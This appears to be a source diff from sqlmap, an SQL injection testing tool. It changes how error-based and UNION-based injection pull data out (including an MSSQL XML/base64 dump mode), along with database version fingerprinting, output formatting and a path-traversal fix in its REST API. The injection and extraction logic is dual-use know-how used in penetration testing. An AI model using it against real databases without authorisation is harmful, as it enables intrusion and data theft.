chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
|
||||
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
|
||||
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
||||
extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0)
|
||||
if extendedField != fieldToCastStr: # e.g. MIN(surname)
|
||||
nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)
|
||||
fieldToCastStr = extendedField
|
||||
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
|
||||
nulledCastedField = agent.hexConvertField(nulledCastedField)
|
||||
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
||||
|
||||
@@ -16,6 +16,7 @@ from lib.core.common import calculateDeltaSeconds
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import decodeHexValue
|
||||
from lib.core.common import extractRegexResult
|
||||
from lib.core.common import getConsoleWidth
|
||||
from lib.core.common import getPartRun
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import hashDBRetrieve
|
||||
@@ -43,6 +44,7 @@ from lib.core.settings import MIN_ERROR_CHUNK_LENGTH
|
||||
from lib.core.settings import MAX_ERROR_CHUNK_LENGTH
|
||||
from lib.core.settings import NULL
|
||||
from lib.core.settings import PARTIAL_VALUE_MARKER
|
||||
from lib.core.settings import ROTATING_CHARS
|
||||
from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD
|
||||
from lib.core.settings import SQL_SCALAR_REGEX
|
||||
from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT
|
||||
@@ -54,6 +56,7 @@ from lib.utils.progress import ProgressBar
|
||||
|
||||
def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
offset = 1
|
||||
rotator = 0
|
||||
partialValue = None
|
||||
threadData = getCurrentThreadData()
|
||||
retVal = hashDBRetrieve(expression, checkConf=True)
|
||||
@@ -173,8 +176,16 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
else:
|
||||
break
|
||||
|
||||
if kb.fileReadMode and output:
|
||||
dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
|
||||
if output:
|
||||
if kb.fileReadMode:
|
||||
dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
|
||||
elif offset > 1:
|
||||
rotator += 1
|
||||
|
||||
if rotator >= len(ROTATING_CHARS):
|
||||
rotator = 0
|
||||
|
||||
dataToStdout("\r%s\r" % ROTATING_CHARS[rotator])
|
||||
else:
|
||||
retVal = output
|
||||
break
|
||||
@@ -203,6 +214,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
|
||||
values = []
|
||||
origExpr = None
|
||||
|
||||
width = getConsoleWidth()
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
for field in expressionFieldsList:
|
||||
@@ -229,7 +241,12 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
|
||||
if kb.fileReadMode and output and output.strip():
|
||||
print
|
||||
elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields):
|
||||
dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(output)))
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output))
|
||||
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
|
||||
dataToStdout("%s\n" % status)
|
||||
|
||||
if isinstance(num, int):
|
||||
expression = origExpr
|
||||
|
||||
@@ -53,10 +53,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
|
||||
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
|
||||
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
|
||||
if _orderByTest(1) and not _orderByTest(randomInt()):
|
||||
infoMsg = "ORDER BY technique seems to be usable. "
|
||||
infoMsg = "'ORDER BY' technique appears to be usable. "
|
||||
infoMsg += "This should reduce the time needed "
|
||||
infoMsg += "to find the right number "
|
||||
infoMsg += "of query columns. Automatically extending the "
|
||||
|
||||
@@ -5,8 +5,10 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import binascii
|
||||
import re
|
||||
import time
|
||||
import xml.etree.ElementTree
|
||||
|
||||
from extra.safe2bin.safe2bin import safecharencode
|
||||
from lib.core.agent import agent
|
||||
@@ -46,8 +48,10 @@ from lib.core.enums import PAYLOAD
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH
|
||||
from lib.core.settings import NULL
|
||||
from lib.core.settings import SQL_SCALAR_REGEX
|
||||
from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.threads import getCurrentThreadData
|
||||
from lib.core.threads import runThreads
|
||||
from lib.core.unescaper import unescaper
|
||||
@@ -62,15 +66,18 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
threadData.resumed = retVal is not None
|
||||
|
||||
if retVal is None:
|
||||
# Prepare expression with delimiters
|
||||
injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
|
||||
|
||||
# Forge the UNION SQL injection request
|
||||
vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
|
||||
kb.unionDuplicates = vector[7]
|
||||
kb.forcePartialUnion = vector[8]
|
||||
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
|
||||
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
|
||||
|
||||
if not kb.rowXmlMode:
|
||||
injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
|
||||
kb.unionDuplicates = vector[7]
|
||||
kb.forcePartialUnion = vector[8]
|
||||
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
|
||||
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
|
||||
else:
|
||||
where = vector[6]
|
||||
query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)
|
||||
|
||||
payload = agent.payload(newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
@@ -78,22 +85,57 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
|
||||
incrementCounter(PAYLOAD.TECHNIQUE.UNION)
|
||||
|
||||
# Parse the returned page to get the exact UNION-based
|
||||
# SQL injection output
|
||||
def _(regex):
|
||||
return reduce(lambda x, y: x if x is not None else y, (\
|
||||
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \
|
||||
extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \
|
||||
if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \
|
||||
None)
|
||||
if not kb.rowXmlMode:
|
||||
# Parse the returned page to get the exact UNION-based
|
||||
# SQL injection output
|
||||
def _(regex):
|
||||
return reduce(lambda x, y: x if x is not None else y, (\
|
||||
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \
|
||||
extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \
|
||||
if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \
|
||||
None)
|
||||
|
||||
# Automatically patching last char trimming cases
|
||||
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
|
||||
warnMsg = "automatically patching output having last char trimmed"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
page = page.replace(kb.chars.stop[:-1], kb.chars.stop)
|
||||
# Automatically patching last char trimming cases
|
||||
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
|
||||
warnMsg = "automatically patching output having last char trimmed"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
page = page.replace(kb.chars.stop[:-1], kb.chars.stop)
|
||||
|
||||
retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
|
||||
retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
|
||||
else:
|
||||
output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page)
|
||||
if output:
|
||||
try:
|
||||
root = xml.etree.ElementTree.fromstring("<root>%s</root>" % output.encode(UNICODE_ENCODING))
|
||||
retVal = ""
|
||||
for column in kb.dumpColumns:
|
||||
base64 = True
|
||||
for child in root:
|
||||
value = child.attrib.get(column, "").strip()
|
||||
if value and not re.match(r"\A[a-zA-Z0-9+/]+={0,2}\Z", value):
|
||||
base64 = False
|
||||
break
|
||||
|
||||
try:
|
||||
value.decode("base64")
|
||||
except binascii.Error:
|
||||
base64 = False
|
||||
break
|
||||
|
||||
if base64:
|
||||
for child in root:
|
||||
child.attrib[column] = child.attrib.get(column, "").decode("base64") or NULL
|
||||
|
||||
for child in root:
|
||||
row = []
|
||||
for column in kb.dumpColumns:
|
||||
row.append(child.attrib.get(column, NULL))
|
||||
retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(row), kb.chars.stop)
|
||||
|
||||
except:
|
||||
pass
|
||||
else:
|
||||
retVal = getUnicode(retVal)
|
||||
|
||||
if retVal is not None:
|
||||
retVal = getUnicode(retVal, kb.pageEncoding)
|
||||
@@ -103,7 +145,8 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
retVal = htmlunescape(retVal).replace("<br>", "\n")
|
||||
|
||||
hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal)
|
||||
else:
|
||||
|
||||
elif not kb.rowXmlMode:
|
||||
trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start))
|
||||
|
||||
if trimmed:
|
||||
@@ -174,6 +217,13 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
# Set kb.partRun in case the engine is called from the API
|
||||
kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None
|
||||
|
||||
if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns:
|
||||
kb.rowXmlMode = True
|
||||
_ = "(%s FOR XML RAW, BINARY BASE64)" % expression
|
||||
output = _oneShotUnionUse(_, False)
|
||||
value = parseUnionPage(output)
|
||||
kb.rowXmlMode = False
|
||||
|
||||
if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper():
|
||||
# Removed ORDER BY clause because UNION does not play well with it
|
||||
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I)
|
||||
@@ -186,7 +236,7 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
# SQL limiting the query output one entry at a time
|
||||
# NOTE: we assume that only queries that get data from a table can
|
||||
# return multiple entries
|
||||
if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \
|
||||
if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \
|
||||
kb.forcePartialUnion or \
|
||||
(dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \
|
||||
" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
|
||||
@@ -328,12 +378,13 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items))
|
||||
_ = ",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
|
||||
dataToStdout("%s\n" % status, True)
|
||||
dataToStdout("%s\n" % status)
|
||||
|
||||
runThreads(numThreads, unionThread)
|
||||
|
||||
|
||||
@@ -31,6 +31,7 @@ from lib.core.data import logger
|
||||
from lib.core.datatype import AttribDict
|
||||
from lib.core.defaults import _defaults
|
||||
from lib.core.enums import CONTENT_STATUS
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.enums import PART_RUN_CONTENT_TYPES
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.log import LOGGER_HANDLER
|
||||
@@ -223,7 +224,7 @@ class StdDbOut(object):
|
||||
# Ignore all non-relevant messages
|
||||
return
|
||||
|
||||
output = conf.database_cursor.execute(
|
||||
output = conf.databaseCursor.execute(
|
||||
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
|
||||
(self.taskid, content_type))
|
||||
|
||||
@@ -231,25 +232,25 @@ class StdDbOut(object):
|
||||
if status == CONTENT_STATUS.COMPLETE:
|
||||
if len(output) > 0:
|
||||
for index in xrange(len(output)):
|
||||
conf.database_cursor.execute("DELETE FROM data WHERE id = ?",
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
|
||||
(output[index][0],))
|
||||
|
||||
conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type, jsonize(value)))
|
||||
if kb.partRun:
|
||||
kb.partRun = None
|
||||
|
||||
elif status == CONTENT_STATUS.IN_PROGRESS:
|
||||
if len(output) == 0:
|
||||
conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type,
|
||||
jsonize(value)))
|
||||
else:
|
||||
new_value = "%s%s" % (dejsonize(output[0][2]), value)
|
||||
conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?",
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
|
||||
(jsonize(new_value), output[0][0]))
|
||||
else:
|
||||
conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
|
||||
(self.taskid, str(value) if value else ""))
|
||||
|
||||
def flush(self):
|
||||
@@ -268,7 +269,7 @@ class LogRecorder(logging.StreamHandler):
|
||||
Record emitted events to IPC database for asynchronous I/O
|
||||
communication with the parent process
|
||||
"""
|
||||
conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
|
||||
(conf.taskid, time.strftime("%X"), record.levelname,
|
||||
record.msg % record.args if record.args else record.msg))
|
||||
|
||||
@@ -276,8 +277,8 @@ class LogRecorder(logging.StreamHandler):
|
||||
def setRestAPILog():
|
||||
if hasattr(conf, "api"):
|
||||
try:
|
||||
conf.database_cursor = Database(conf.database)
|
||||
conf.database_cursor.connect("client")
|
||||
conf.databaseCursor = Database(conf.database)
|
||||
conf.databaseCursor.connect("client")
|
||||
except sqlite3.OperationalError, ex:
|
||||
raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database)
|
||||
|
||||
@@ -622,14 +623,13 @@ def download(taskid, target, filename):
|
||||
logger.warning("[%s] Invalid task ID provided to download()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Prevent file path traversal - the lame way
|
||||
if ".." in target:
|
||||
path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename))
|
||||
# Prevent file path traversal
|
||||
if not path.startswith(paths.SQLMAP_OUTPUT_PATH):
|
||||
logger.warning("[%s] Forbidden path (%s)" % (taskid, target))
|
||||
return jsonize({"success": False, "message": "Forbidden path"})
|
||||
|
||||
path = os.path.join(paths.SQLMAP_OUTPUT_PATH, target)
|
||||
|
||||
if os.path.exists(path):
|
||||
if os.path.isfile(path):
|
||||
logger.debug("[%s] Retrieved content of file %s" % (taskid, target))
|
||||
with open(path, 'rb') as inf:
|
||||
file_content = inf.read()
|
||||
@@ -644,7 +644,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
|
||||
REST-JSON API server
|
||||
"""
|
||||
DataStore.admin_id = hexencode(os.urandom(16))
|
||||
Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1]
|
||||
Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)[1]
|
||||
|
||||
logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port))
|
||||
logger.info("Admin ID: %s" % DataStore.admin_id)
|
||||
@@ -722,7 +722,8 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
|
||||
|
||||
while True:
|
||||
try:
|
||||
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower()
|
||||
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip()
|
||||
command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command)
|
||||
except (EOFError, KeyboardInterrupt):
|
||||
print
|
||||
break
|
||||
|
||||
@@ -22,6 +22,7 @@ from lib.core.common import safeCSValue
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
|
||||
@@ -198,7 +199,7 @@ def storeResultsToFile(results):
|
||||
kb.storeCrawlingChoice = test[0] in ("y", "Y")
|
||||
|
||||
if kb.storeCrawlingChoice:
|
||||
handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt")
|
||||
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=".csv" if conf.forms else ".txt")
|
||||
os.close(handle)
|
||||
|
||||
infoMsg = "writing crawling results to a temporary file '%s' " % filename
|
||||
|
||||
@@ -30,6 +30,7 @@ import os
|
||||
import re
|
||||
import tempfile
|
||||
import time
|
||||
import zipfile
|
||||
|
||||
from hashlib import md5
|
||||
from hashlib import sha1
|
||||
@@ -45,6 +46,7 @@ from lib.core.common import dataToStdout
|
||||
from lib.core.common import getFileItems
|
||||
from lib.core.common import getPublicTypeMembers
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import hashDBWrite
|
||||
from lib.core.common import normalizeUnicode
|
||||
@@ -60,6 +62,8 @@ from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import HASH
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import COMMON_PASSWORD_SUFFIXES
|
||||
from lib.core.settings import COMMON_USER_COLUMNS
|
||||
@@ -384,7 +388,7 @@ def storeHashesToFile(attack_dict):
|
||||
if not kb.storeHashesChoice:
|
||||
return
|
||||
|
||||
handle, filename = tempfile.mkstemp(prefix="sqlmaphashes-", suffix=".txt")
|
||||
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt")
|
||||
os.close(handle)
|
||||
|
||||
infoMsg = "writing hashes to a temporary file '%s' " % filename
|
||||
@@ -501,7 +505,7 @@ def attackDumpedTable():
|
||||
value = table[column]['values'][i]
|
||||
|
||||
if value and value.lower() in lut:
|
||||
table[column]['values'][i] += " (%s)" % lut[value.lower()]
|
||||
table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()]))
|
||||
table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))
|
||||
|
||||
def hashRecognition(value):
|
||||
@@ -785,6 +789,14 @@ def dictionaryAttack(attack_dict):
|
||||
for dictPath in dictPaths:
|
||||
checkFile(dictPath)
|
||||
|
||||
if os.path.splitext(dictPath)[1].lower() == ".zip":
|
||||
_ = zipfile.ZipFile(dictPath, 'r')
|
||||
if len(_.namelist()) == 0:
|
||||
errMsg = "no file(s) inside '%s'" % dictPath
|
||||
raise SqlmapDataException(errMsg)
|
||||
else:
|
||||
_.open(_.namelist()[0])
|
||||
|
||||
kb.wordlists = dictPaths
|
||||
|
||||
except Exception, ex:
|
||||
|
||||
@@ -66,7 +66,7 @@ class HashDB(object):
|
||||
@staticmethod
|
||||
def hashKey(key):
|
||||
key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key)
|
||||
retVal = int(hashlib.md5(key).hexdigest()[:12], 16)
|
||||
retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400
|
||||
return retVal
|
||||
|
||||
def retrieve(self, key, unserialize=False):
|
||||
@@ -97,6 +97,7 @@ class HashDB(object):
|
||||
try:
|
||||
retVal = unserializeObject(retVal)
|
||||
except:
|
||||
retVal = None
|
||||
warnMsg = "error occurred while unserializing value for session key '%s'. " % key
|
||||
warnMsg += "If the problem persists please rerun with `--flush-session`"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
@@ -11,14 +11,17 @@ from extra.safe2bin.safe2bin import safechardecode
|
||||
from lib.core.agent import agent
|
||||
from lib.core.bigarray import BigArray
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import isNoneValue
|
||||
from lib.core.common import isNumPosStrValue
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.core.common import unsafeSQLIdentificatorNaming
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import queries
|
||||
from lib.core.dicts import DUMP_REPLACEMENTS
|
||||
from lib.core.enums import CHARSET_TYPE
|
||||
from lib.core.enums import EXPECTED
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
@@ -134,10 +137,13 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
||||
value = _(column, pivotValue)
|
||||
if column == colList[0]:
|
||||
if isNoneValue(value):
|
||||
for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))):
|
||||
value = _(column, pivotValue)
|
||||
if not isNoneValue(value):
|
||||
break
|
||||
try:
|
||||
for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))):
|
||||
value = _(column, pivotValue)
|
||||
if not isNoneValue(value):
|
||||
break
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
if isNoneValue(value):
|
||||
breakRetrieval = True
|
||||
@@ -156,10 +162,12 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
||||
|
||||
value = "" if isNoneValue(value) else unArrayizeValue(value)
|
||||
|
||||
lengths[column] = max(lengths[column], len(value) if value else 0)
|
||||
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
|
||||
entries[column].append(value)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
@@ -5,7 +5,6 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import cookielib
|
||||
import httplib
|
||||
import re
|
||||
import socket
|
||||
@@ -26,7 +25,6 @@ from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.enums import REDIRECTION
|
||||
from lib.core.exception import SqlmapBaseException
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import DUMMY_SEARCH_USER_AGENT
|
||||
from lib.core.settings import DUCKDUCKGO_REGEX
|
||||
@@ -35,7 +33,6 @@ from lib.core.settings import GOOGLE_REGEX
|
||||
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.request.basic import decodePage
|
||||
from lib.request.httpshandler import HTTPSHandler
|
||||
from thirdparty.socks import socks
|
||||
|
||||
|
||||
|
||||
@@ -106,12 +106,6 @@ class Fingerprint(GenericFingerprint):
|
||||
if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
|
||||
or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \
|
||||
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
|
||||
v = Backend.getVersion().replace(">", "")
|
||||
v = v.replace("=", "")
|
||||
v = v.replace(" ", "")
|
||||
|
||||
Backend.setVersion(v)
|
||||
|
||||
setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion()))
|
||||
|
||||
self.getBanner()
|
||||
|
||||
@@ -83,12 +83,6 @@ class Fingerprint(GenericFingerprint):
|
||||
if not conf.extensiveFp and (Backend.isDbmsWithin(HSQLDB_ALIASES) \
|
||||
or (conf.dbms or "").lower() in HSQLDB_ALIASES) and Backend.getVersion() and \
|
||||
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
|
||||
v = Backend.getVersion().replace(">", "")
|
||||
v = v.replace("=", "")
|
||||
v = v.replace(" ", "")
|
||||
|
||||
Backend.setVersion(v)
|
||||
|
||||
setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion()))
|
||||
|
||||
if Backend.isVersionGreaterOrEqualThan("1.7.2"):
|
||||
|
||||
@@ -41,7 +41,7 @@ class Connector(GenericConnector):
|
||||
|
||||
try:
|
||||
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
|
||||
except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg:
|
||||
except (pymssql.Error, _mssql.MssqlDatabaseException), msg:
|
||||
raise SqlmapConnectionException(msg)
|
||||
|
||||
self.initCursor()
|
||||
@@ -50,7 +50,7 @@ class Connector(GenericConnector):
|
||||
def fetchall(self):
|
||||
try:
|
||||
return self.cursor.fetchall()
|
||||
except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg:
|
||||
except (pymssql.Error, _mssql.MssqlDatabaseException), msg:
|
||||
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
|
||||
return None
|
||||
|
||||
|
||||
@@ -93,7 +93,9 @@ class Fingerprint(GenericFingerprint):
|
||||
for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
|
||||
("2005", "XACT_STATE()=XACT_STATE()"), \
|
||||
("2008", "SYSDATETIME()=SYSDATETIME()"), \
|
||||
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)")):
|
||||
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \
|
||||
("2014", "CHARINDEX('12.0.2000',@@version)>0"), \
|
||||
("2016", "ISJSON(NULL) IS NULL")):
|
||||
result = inject.checkBooleanExpression(check)
|
||||
|
||||
if result:
|
||||
|
||||
@@ -10,10 +10,13 @@ import re
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import Format
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import hashDBWrite
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import HASHDB_KEYS
|
||||
from lib.core.enums import OS
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import MYSQL_ALIASES
|
||||
@@ -37,17 +40,18 @@ class Fingerprint(GenericFingerprint):
|
||||
|
||||
return None
|
||||
|
||||
# MySQL valid versions updated on 04/2011
|
||||
# Reference: https://downloads.mysql.com/archives/community/
|
||||
versions = (
|
||||
(32200, 32235), # MySQL 3.22
|
||||
(32300, 32359), # MySQL 3.23
|
